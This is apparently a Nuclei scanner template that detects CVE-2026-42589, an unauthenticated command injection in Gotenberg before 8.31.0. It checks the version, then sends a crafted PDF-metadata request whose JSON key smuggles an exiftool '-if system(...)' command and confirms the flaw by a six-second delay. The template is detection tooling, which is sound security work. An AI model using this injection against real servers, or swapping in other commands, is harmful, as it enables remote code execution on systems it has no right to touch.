id: CVE-2026-42589

info:
  name: Gotenberg - Command Injection
  author: fineman999
  severity: critical
  description: |
    Gotenberg < 8.31.0 contains a command injection caused by lack of validation on JSON metadata keys in /forms/pdfengines/metadata/write endpoint, letting unauthenticated attackers execute OS commands, exploit requires crafted HTTP request.
  impact: |
    Unauthenticated attackers can execute arbitrary OS commands remotely, potentially leading to full system compromise.
  remediation: |
    Update to version 8.31.0 or later.
  reference:
    - https://github.com/gotenberg/gotenberg/security/advisories/GHSA-rqgh-gxv4-6657
    - https://github.com/gotenberg/gotenberg/releases/tag/v8.31.0
    - https://nvd.nist.gov/vuln/detail/CVE-2026-42589
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-42589
    epss-score: 0.02397
    epss-percentile: 0.81851
    cwe-id: CWE-78
  metadata:
    verified: true
    vendor: gotenberg
    product: gotenberg
    max-request: 2
  tags: cve,cve2026,gotenberg,exiftool,rce,unauth

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /version HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'compare_versions(version, "< 8.31.0")'
          - 'contains(to_lower(header), "gotenberg")'
          - 'status_code == 200'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - "([0-9.]+)"
        internal: true

  - raw:
      - |
        @timeout: 10s
        POST /forms/pdfengines/metadata/write HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}}

        ------WebKitFormBoundary{{randstr}}
        Content-Disposition: form-data; name="files"; filename="sample.pdf"
        Content-Type: application/pdf

        %PDF-1.1
        1 0 obj
        << /Type /Catalog /Pages 2 0 R >>
        endobj
        2 0 obj
        << /Type /Pages /Kids [3 0 R] /Count 1 >>
        endobj
        3 0 obj
        << /Type /Page /Parent 2 0 R /MediaBox [0 0 200 200] >>
        endobj
        xref
        0 4
        0000000000 65535 f
        0000000009 00000 n
        0000000058 00000 n
        0000000115 00000 n
        trailer
        << /Root 1 0 R /Size 4 >>
        startxref
        186
        %%EOF
        ------WebKitFormBoundary{{randstr}}
        Content-Disposition: form-data; name="metadata"

        {"Title\n-if\nsystem('sleep 6')||1\n-Comment":"x"}
        ------WebKitFormBoundary{{randstr}}--

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "status_code == 500"
          - "duration >= 6"
        condition: and
# digest: 4a0a0047304502205eda6c504549d6c5182ff90e852a8c7f983095f5371e05e09419c823e994194d02210088974083d6995e601dec0b6dc33fb3f5ef286d285999e5f32bf1b8864313d253:922c64590222798bb761d5b6d8e72950